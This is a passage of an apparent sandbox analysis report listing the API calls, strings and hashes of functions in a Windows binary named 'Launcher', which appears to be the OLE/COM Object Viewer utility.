                                                                                                                • #2634.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00B5FDF5
                                                                                                                • LoadLibraryW.KERNEL32(OLE32.DLL,000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00B5FDFF
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoRegisterSurrogate), ref: 00B5FE11
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00B5FE26
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2634#3087$Library$#4704AddressFreeLoadProc
                                                                                                                • String ID: Apartment$Both$CoRegisterSurrogate$Free$Inproc Handler$Inproc Server$Local Server$Neutral$None$OLE32.DLL
                                                                                                                • API String ID: 2746026577-3659237039
                                                                                                                • Opcode ID: 5ac9e5e1faaf73436e0b7c2e13c94e37e40ba0b60683555aeae0a9368fc290c5
                                                                                                                • Instruction ID: c495d4941815ba98e75d257a3e8df43700701f4442b4caed5ce581b9a197891a
                                                                                                                • Opcode Fuzzy Hash: 5ac9e5e1faaf73436e0b7c2e13c94e37e40ba0b60683555aeae0a9368fc290c5
                                                                                                                • Instruction Fuzzy Hash: 573133316002156BEB216F65DC4EE9F7EFAEF82B51F0100B4BD196A262CFB58945CB60

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5EAED
                                                                                                                • #338.MFC42U(0000000C,00B5EAD7,00000004), ref: 00B5EAF7
                                                                                                                • #540.MFC42U(0000000C,00B5EAD7,00000004), ref: 00B5EB0B
                                                                                                                • #860.MFC42U(00B5349E,0000000C,00B5EAD7,00000004), ref: 00B5EB27
                                                                                                                • #540.MFC42U ref: 00B5EB36
                                                                                                                • #540.MFC42U ref: 00B5EB42
                                                                                                                • #4155.MFC42U(00000004), ref: 00B5EB50
                                                                                                                • #4155.MFC42U(00000008,00000004), ref: 00B5EB5A
                                                                                                                • #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 00B5EB6E
                                                                                                                • #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EB7E
                                                                                                                • #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EB8D
                                                                                                                • #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EB9D
                                                                                                                • #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EBAC
                                                                                                                • #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EBB7
                                                                                                                • #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00B5EBBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3516#540$#4155#800#861$#338#860H_prolog3
                                                                                                                • String ID: ExpertMode$ViewHiddenComCats
                                                                                                                • API String ID: 3415677798-816868219
                                                                                                                • Opcode ID: a816dbc2f9b5d98740669161df79fc378a138621807b9afb5d2f855f46999f2d
                                                                                                                • Instruction ID: 163038e989b86b82422289c8c5771e40b8ced30692667927f9b9c51edb91c4d1
                                                                                                                • Opcode Fuzzy Hash: a816dbc2f9b5d98740669161df79fc378a138621807b9afb5d2f855f46999f2d
                                                                                                                • Instruction Fuzzy Hash: FA217C75E007069ADF11EBA0C856BAEB7F1AF64701F100498F4513B3D2DBB95A08CB21

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B69205: SendMessageW.USER32(?,00001109,00B6803D,00000000), ref: 00B69220
                                                                                                                  • Part of subcall function 00B69205: #2857.MFC42U(00000000,?,00B6803D,00000000,F6B930CF), ref: 00B69227
                                                                                                                • #1662.MFC42U(00000000,F6B930CF), ref: 00B6807F
                                                                                                                  • Part of subcall function 00B5E18B: SendMessageW.USER32(?,0000000B,?,00000000), ref: 00B5E19A
                                                                                                                • CoCreateInstance.OLE32(00B536E4,00000000,00000001,00B536F4,00000000,00000000,F6B930CF), ref: 00B680AB
                                                                                                                  • Part of subcall function 00B67F0B: SendMessageW.USER32(?,00001132,00000000,00B64852), ref: 00B67F1D
                                                                                                                • #2644.MFC42U(00000000), ref: 00B68436
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1662#2644#2857CreateInstance
                                                                                                                • String ID: All Objects$Application IDs$COM Library Objects$Grouped by Component Category$Interfaces$OLE 1.0 Objects$OLE Controls$OLE Embeddable Objects$Object Classes$Type Libraries$Unclassified Objects$g
                                                                                                                • API String ID: 2376137332-450955224
                                                                                                                • Opcode ID: b0c796b3104b5535029bedecd4c5f68bb4fbb4df422be063332677874527e25b
                                                                                                                • Instruction ID: 72471f7da7a2045c24c01504e431c709dc21e1b0953591784ef62d76ca278a2c
                                                                                                                • Opcode Fuzzy Hash: b0c796b3104b5535029bedecd4c5f68bb4fbb4df422be063332677874527e25b
                                                                                                                • Instruction Fuzzy Hash: 9CE1E3B0A10259DFDB14EFE4C899BAEBBF5BF44309F100498E415AB3A1DB799849CF10

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • #3867.MFC42U(?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B5F09C
                                                                                                                • #3087.MFC42U(000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B5F0B2
                                                                                                                • #2634.MFC42U(000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B5F0B9
                                                                                                                • #3087.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B5F0C6
                                                                                                                • #2634.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B5F0CD
                                                                                                                • #3087.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B5F0DA
                                                                                                                • #2634.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00B521A0), ref: 00B5F0E1
                                                                                                                • #3087.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 00B5F0EE
                                                                                                                • #2634.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 00B5F0F5
                                                                                                                • #3087.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000), ref: 00B5F102
                                                                                                                • #2634.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001,00000001,00000000), ref: 00B5F109
                                                                                                                • #3087.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001), ref: 00B5F116
                                                                                                                • #2634.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00B5FC3A,00000001), ref: 00B5F11D
                                                                                                                • #3087.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 00B5F12A
                                                                                                                • #2634.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 00B5F131
                                                                                                                • #3087.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 00B5F13E
                                                                                                                • #2634.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 00B5F145
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2634#3087$#3867
                                                                                                                • String ID:
                                                                                                                • API String ID: 580456896-0
                                                                                                                • Opcode ID: 39213ee3110f43d3d0ecd1f0379e97f5d0cf9b483d7a920b26feb77acbdc17e6
                                                                                                                • Instruction ID: cef6a25911950d270f6d55fdbf4ba303597e37c998fe6160b9a4b842d0464e0a
                                                                                                                • Opcode Fuzzy Hash: 39213ee3110f43d3d0ecd1f0379e97f5d0cf9b483d7a920b26feb77acbdc17e6
                                                                                                                • Instruction Fuzzy Hash: 4E01E129F5136422DE3A3675086BABE28D74FC2BD0F044498B22A7F2D7DD6DC9019399

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • #4714.MFC42U ref: 00B5DA47
                                                                                                                • #2078.MFC42U(00000085,?), ref: 00B5DA60
                                                                                                                • #2078.MFC42U(00000087,?,00000085,?), ref: 00B5DA71
                                                                                                                • #2078.MFC42U(00000088,?,00000087,?,00000085,?), ref: 00B5DA84
                                                                                                                • #2078.MFC42U(0000008B,?,00000088,?,00000087,?,00000085,?), ref: 00B5DA97
                                                                                                                • #2078.MFC42U(0000008E,?,0000008B,?,00000088,?,00000087,?,00000085,?), ref: 00B5DAAA
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00B5DABE
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00B5DAD0
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8B7
                                                                                                                  • Part of subcall function 00B5C8A6: ScreenToClient.USER32(?,?), ref: 00B5C8C4
                                                                                                                  • Part of subcall function 00B5C8A6: #3133.MFC42U(?,?,?,00B5C46E,?), ref: 00B5C8CC
                                                                                                                • #6193.MFC42U(00000000,000000FF,?,?,?,0000001C,?), ref: 00B5DB03
                                                                                                                • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?,?,0000001C,?), ref: 00B5DB1B
                                                                                                                • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?), ref: 00B5DB34
                                                                                                                • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00B5DB48
                                                                                                                • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00B5DB5C
                                                                                                                • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00B5DB70
                                                                                                                • #6127.MFC42U(00000001,00000001,00000001,6BAA0790,6BAA0790,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8), ref: 00B5DB84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6193$#2078$ClientRectScreenWindow$#3133#4714#6127
                                                                                                                • String ID:
                                                                                                                • API String ID: 1113752235-0
                                                                                                                • Opcode ID: 5d7b9cb861ecbfe6a7bc6712c66a72dbe21c6cac8e9d94b8652f6f7f4d89470a
                                                                                                                • Instruction ID: d2c2d78fa61179081c80ad15ff0f66c7e49e6079b8fec558eda31ec1bba3d57c
                                                                                                                • Opcode Fuzzy Hash: 5d7b9cb861ecbfe6a7bc6712c66a72dbe21c6cac8e9d94b8652f6f7f4d89470a
                                                                                                                • Instruction Fuzzy Hash: A84142307402047BEB24DB65DC9AFEF3BA9EB85B54F404078B5196F1C2DE659D05C760

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 579 b6bd2a-b6bd31 call b6d4cd 582 b6bd33-b6bd40 LoadLibraryW 579->582 583 b6bd80 579->583 584 b6bd42-b6bd49 582->584 585 b6bd5e-b6bd71 GetProcAddress 582->585 587 b6bd4e-b6bd58 MessageBoxW exit 584->587 585->583 586 b6bd73-b6bd7e 585->586 586->587 587->585
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B6D4CD: GetVersionExW.KERNEL32(?), ref: 00B6D4F3
                                                                                                                • LoadLibraryW.KERNEL32(ACLUI.DLL,00B5B51D), ref: 00B6BD38
                                                                                                                • MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 00B6BD50
                                                                                                                • exit.MSVCRT ref: 00B6BD58
                                                                                                                • GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 00B6BD64
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadMessageProcVersionexit
                                                                                                                • String ID: ACLUI.DLL$Couldn't get address of EditSecurity ACLUI.DLL!$Couldn't load ACLUI.DLL!$EditSecurity$OLEViewer$OleViewer
                                                                                                                • API String ID: 2950567464-1848169023
                                                                                                                • Opcode ID: 8f4ef78302e013adb1df92de51eb2f0519bdd48ad91c24923a37b8168a343735
                                                                                                                • Instruction ID: 1393fa6ec653f8825bfc85d0708fa670803db253e4ee10ce1ef7db32f8cc8b83
                                                                                                                • Opcode Fuzzy Hash: 8f4ef78302e013adb1df92de51eb2f0519bdd48ad91c24923a37b8168a343735
                                                                                                                • Instruction Fuzzy Hash: 8FE01A31385345AAE6202B606D5BF2A2BE5AB14B43F4400E4FA4AEA0F0DFE594889619

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 588 b60d90-b60db5 #5491 #4451 589 b60e60 588->589 590 b60dbb-b60dd5 #2112 588->590 592 b60e63-b60e66 589->592 590->589 591 b60ddb-b60de6 #4158 590->591 591->589 593 b60de8-b60e13 #5867 #2109 591->593 593->589 594 b60e15-b60e25 #5996 593->594 594->589 595 b60e27-b60e5e #3477 #6063 #2550 594->595 595->592
                                                                                                                APIs
                                                                                                                • #5491.MFC42U ref: 00B60DA3
                                                                                                                • #4451.MFC42U(?), ref: 00B60DAD
                                                                                                                • #2112.MFC42U(?,50002800,0000E800,?), ref: 00B60DCE
                                                                                                                • #4158.MFC42U(00000002,?,50002800,0000E800,?), ref: 00B60DDF
                                                                                                                • #5867.MFC42U(?,00000002,?,50002800,0000E800,?), ref: 00B60DF4
                                                                                                                • #2109.MFC42U(?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00B60E0C
                                                                                                                • #5996.MFC42U(00B739A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00B60E1E
                                                                                                                • #3477.MFC42U(00000000,?,?,?,00B739A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00B60E37
                                                                                                                • #6063.MFC42U(00000000,00000000,?,?,00000000,?,?,?,00B739A0,00000001,?,50008200,0000E801,?,00000002), ref: 00B60E4E
                                                                                                                • #2550.MFC42U(00000001,00000000,00000000,?,?,00000000,?,?,?,00B739A0,00000001,?,50008200,0000E801,?,00000002), ref: 00B60E57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2109#2112#2550#3477#4158#4451#5491#5867#5996#6063
                                                                                                                • String ID:
                                                                                                                • API String ID: 1972827604-0
                                                                                                                • Opcode ID: 9f342737e79868247155623a6e54909dcee47b20ec3721a12e9923212cada14a
                                                                                                                • Instruction ID: b722398f121d3def82bd1468b1ea35bcdbc1ae5ccce653e54362a904928eb439
                                                                                                                • Opcode Fuzzy Hash: 9f342737e79868247155623a6e54909dcee47b20ec3721a12e9923212cada14a
                                                                                                                • Instruction Fuzzy Hash: DA11E63972022476EE1072718C96FFF72DEDFC0710F1809A4BA27E61C1DEA8E9058761
                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B60CCD
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00B60CF8
                                                                                                                • SendMessageW.USER32(?,00001061,00000001,?), ref: 00B60D1C
                                                                                                                • #2634.MFC42U(00000000), ref: 00B60D2A
                                                                                                                • #2634.MFC42U(00000000,00000000), ref: 00B60D37
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2634MessageSend$#4704
                                                                                                                • String ID: Can Launch$User/Group$j
                                                                                                                • API String ID: 3599582684-3481516568
                                                                                                                • Opcode ID: e0118c94f5f7745ad88dc5ebd6813981725938571bc9e4bdcae39e4eafabd968
                                                                                                                • Instruction ID: 293b8e332f45b365059a21cf99e7cee600ef81e9638c995b0fdbecdf869aaa6b
                                                                                                                • Opcode Fuzzy Hash: e0118c94f5f7745ad88dc5ebd6813981725938571bc9e4bdcae39e4eafabd968
                                                                                                                • Instruction Fuzzy Hash: 38014F759003086BEB219FA0CC45FEFBBF9EB45714F000459F61576290DBB59985CBA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2849151604-0
                                                                                                                • Opcode ID: 7a0306d363e263ade73ee68589dac973046017a80effea6a57dba72569712e1e
                                                                                                                • Instruction ID: 2ddee8e62c40d1bf9e3c9cc1bd0c99328843daf2734d71cddfdf8cd01fa7c9bc
                                                                                                                • Opcode Fuzzy Hash: 7a0306d363e263ade73ee68589dac973046017a80effea6a57dba72569712e1e
                                                                                                                • Instruction Fuzzy Hash: A0411039A44315CFEB249B58EC0177A33E0FB04B11F1001AAE82AA72E0CF79CD81DB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$wsprintf
                                                                                                                • String ID: APPID\%s$AppID
                                                                                                                • API String ID: 3128662910-1823611323
                                                                                                                • Opcode ID: 81137ac9b0e1cc688e328fd71acc7833165de00e4d591f1c3cb53ed5ee9e8822
                                                                                                                • Instruction ID: 3ab1447ee807573d807ffa81e09e219dc4884fa894432110463c694adb608aff
                                                                                                                • Opcode Fuzzy Hash: 81137ac9b0e1cc688e328fd71acc7833165de00e4d591f1c3cb53ed5ee9e8822
                                                                                                                • Instruction Fuzzy Hash: 220161B1A00318ABCB10EF24DC89A9B7BFCEF45705F5041D5BD19A3252DB749E888BA0
                                                                                                                APIs
                                                                                                                • #2244.MFC42U(?,00000001,00000002,50000000,0000E900), ref: 00B616E1
                                                                                                                • #3476.MFC42U(00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00B61744
                                                                                                                • #3476.MFC42U(00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00B61755
                                                                                                                • #5848.MFC42U(00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00B6175D
                                                                                                                • #5906.MFC42U(00000000,000000F0,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00B6176B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3476$#2244#5848#5906
                                                                                                                • String ID:
                                                                                                                • API String ID: 2288433627-0
                                                                                                                • Opcode ID: d5bdda9e2d4a774971e929065bd6dd701569399a73fec146be65b1f2bfe8916f
                                                                                                                • Instruction ID: 2b1714cb8430b0b07ccf8a43b004bc5b3e648e910279d6a7ad0d5756aae79512
                                                                                                                • Opcode Fuzzy Hash: d5bdda9e2d4a774971e929065bd6dd701569399a73fec146be65b1f2bfe8916f
                                                                                                                • Instruction Fuzzy Hash: 6A11C1353812107BEA205B264C89F7B7A9EDF89760F0804A5BD16EB2C1DEA4AC00C6B0
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B6153D
                                                                                                                • #366.MFC42U(00000004,00B60D8A,00000004), ref: 00B61547
                                                                                                                • #527.MFC42U(00000004,00B60D8A,00000004), ref: 00B6155C
                                                                                                                • #529.MFC42U(00000004,00B60D8A,00000004), ref: 00B6156B
                                                                                                                • #554.MFC42U(00000004,00B60D8A,00000004), ref: 00B6157A
                                                                                                                  • Part of subcall function 00B615A4: #439.MFC42U ref: 00B615B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #366#439#527#529#554H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3098594135-0
                                                                                                                • Opcode ID: 4c7b0770f8e8173ee69713a3c1be355d3dea1cde8d7db9b3c8452657fb3e3caa
                                                                                                                • Instruction ID: e83e4646bf80924fc7cfefd3c9facf36d4daf7346ed6e4112a6b7868a72ceef2
                                                                                                                • Opcode Fuzzy Hash: 4c7b0770f8e8173ee69713a3c1be355d3dea1cde8d7db9b3c8452657fb3e3caa
                                                                                                                • Instruction Fuzzy Hash: 86F05E75811780CBE710EBA4C1567EDB7E0BF24305F5448CDE5EA13282EBB86608CB62
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D70D
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00B6D6E4,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D72C
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00B6D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00B6D738
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
